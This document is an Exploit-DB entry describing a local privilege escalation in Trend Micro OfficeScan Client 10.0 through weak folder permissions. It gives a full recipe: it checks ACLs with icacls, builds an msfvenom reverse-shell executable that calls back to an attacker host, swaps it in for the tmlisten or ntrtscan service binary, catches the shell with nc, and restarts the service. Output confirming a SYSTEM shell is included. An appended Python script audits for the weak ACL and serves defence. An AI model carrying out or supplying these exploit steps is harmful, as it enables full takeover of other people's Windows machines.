
[local] Trend Micro OfficeScan Client 10.0 - ACL Service LPE

source link: https://www.exploit-db.com/exploits/51453

EDB-ID: 51453
Author: msd0pe
Type: local
Platform: Windows
Date: 2023-05-23

#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE 
#  Date: 2023/05/04                                                     
#  Exploit Author: msd0pe                                               
#  Vendor Homepage: https://www.trendmicro.com                          
#  My Github: https://github.com/msd0pe-1                                                                                             


Trend Micro OfficeScan Client:
Versions <= 10.0 contain incorrect ACL rights on the OfficeScan client folder, which allow attackers to escalate privileges to the system level through the services. This vulnerability does not require any privileged access.

[1] Verify the folder rights:
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

[2] Get information about the services:
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem

OR

    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

    OR

    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

[4] Upload the reverse shell to C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe

[5] Start listener
    > nc -lvp 4444

[6] Restart the service or reboot the server
    > sc stop tmlisten
    > sc start tmlisten
    
    OR
    
    > sc stop ntrtscan
    > sc start ntrtscan

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system
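
Defender-side check for the condition shown in steps [1] and [2], as an added example that is not part of the original exploit entry: it parses captured icacls and sc qc output and reports write-capable ACEs held by low-privileged groups on a folder that holds a LocalSystem service binary. The LOW_PRIV group list, the function names and the restriction to the simple rights F, M and W are assumptions; the sample input is trimmed from the output shown above.

```python
import ntpath
import re

# Assumed audit policy: groups that every unprivileged local user belongs to.
LOW_PRIV = {r"BUILTIN\Users", "Everyone", r"NT AUTHORITY\Authenticated Users"}
WRITE_RIGHTS = {"F", "M", "W"}          # simple icacls rights that allow replacing files
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")

def parse_icacls(output, folder):
    """Yield (principal, inherit_flags, rights) for each ACE icacls printed."""
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(folder):      # the first ACE shares a line with the path
            line = line[len(folder):].strip()
        m = ACE_RE.match(line)
        if m:
            groups = re.findall(r"\(([^)]*)\)", m.group(2))
            inherit = {g for g in groups if g in INHERIT_FLAGS}
            rights = {r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")}
            yield m.group(1), inherit, rights

def parse_sc_qc(output):
    """Return (service, binary path, account) from `sc qc` output."""
    def field(key):
        return re.search(rf"^\s*{key}\s*:\s*(.*)$", output, re.M).group(1).strip()
    binary = re.match(r'"([^"]+)"|(\S+)', field("BINARY_PATH_NAME"))
    return field("SERVICE_NAME"), binary.group(1) or binary.group(2), field("SERVICE_START_NAME")

def audit(icacls_out, folder, sc_out):
    """List weak ACEs on the folder if it holds a LocalSystem service binary."""
    service, binary, account = parse_sc_qc(sc_out)
    same_dir = ntpath.normcase(ntpath.dirname(binary)) == ntpath.normcase(folder)
    if not same_dir or account.lower() != "localsystem":
        return []
    return [(service, who, "children" if "IO" in inherit else "folder", sorted(rights & WRITE_RIGHTS))
            for who, inherit, rights in parse_icacls(icacls_out, folder)
            if who in LOW_PRIV and rights & WRITE_RIGHTS]

# Sample input: trimmed from the icacls and sc qc output in steps [1] and [2].
FOLDER = r"C:\Program Files (x86)\Trend Micro\OfficeScan Client"
ICACLS = FOLDER + r""" NT AUTHORITY\SYSTEM:(F)
    BUILTIN\Users:(F)
    BUILTIN\Users:(OI)(CI)(IO)(F)"""
SC_QC = r"""SERVICE_NAME: tmlisten
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
        SERVICE_START_NAME : LocalSystem"""

print(audit(ICACLS, FOLDER, SC_QC))
```

Both BUILTIN\Users full-control entries from step [1] are reported: the one on the folder itself and the inherit-only one that applies to the files inside it.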